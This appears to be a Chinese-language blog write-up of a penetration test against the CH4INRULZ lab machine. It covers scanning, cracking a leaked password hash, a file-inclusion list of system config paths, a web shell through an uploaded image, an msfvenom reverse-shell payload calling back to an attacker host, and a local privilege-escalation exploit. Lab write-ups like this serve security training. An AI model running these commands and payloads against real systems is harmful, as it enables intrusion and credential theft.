CH4INRULZ从渗透到提权

下载了镜像后查看了ip

http://192.168.16.128/

然后用nmap扫描了一波

sudo nmap -vv -sV  192.168.16.128

访问80端口发现是个个人博客

访问8081端口发现也是个站点

先搞web 然后开始用工具扫描目录

80端口扫描发现

8011端口发现api目录

访问80端口的development目录发现需要登陆

同时扫描器还扫描到了

http://192.168.16.128:80/index.html.bak

发现了frank的hash 然后利用john工具进行了破解

john hash.txt

发现密码是

frank!!!

登陆development发现

http://192.168.16.128/development/

继续访问

http://192.168.16.128/development/uploader

经过一番fuzz

t.php.aaa    5.php   5.php[1234567] 5.php%89 都不可以

都无法传成功

于是转战8011端口

http://192.168.16.128:8011/api/

挨个访问发现只有

能访问

看他页面提示发现是缺少个参数

于是尝试给他传个参数

文件包含 or 任意文件读取

接下来的思路就是读配置文件,读日志,找网站根目录进而找到刚才传的图片马来配合

于是进行了一波fuzz

file = /etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/var/lib/mlocate/mlocate.db
/etc/apache2/envvars
/etc/httpd/conf/httpd.conf
/etc/my.cnf
.bash_history
/usr/local/nginx/conf/nginx.conf
/etc/httpd/conf/httpd.conf 
/etc/apache2/apache2.conf
/proc/self/environ

file=//etc/apache2/sites-available/default

读到了配置信息

翻看有用的信息

另外一个web在

根据路径推断出了在80端口上传的图片

file=/var/www/development/uploader/FRANKuploads/1.jpg

出现了熟悉的画面

🐜剑连接

在tmp目录下上传Linux_Exploit_Suggester.pl

根据探测信息搜索exp

caidao中 执行并不会返回root的命令行

然后尝试nc反弹发现 -e参数 不能用 /bin/bash也弹不回来

然后

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.109  LPORT=13333 -f raw -o x.php

在tmp目录上传,然后在msf上监听

随后在tmp目录下执行

php -f "x.php"

成功反弹shell

然后执行

gcc exp.c -o exp
./exp

Cool

posted @ 2019-04-01 18:36  奥利给胖虎  阅读(140)  评论(0编辑  收藏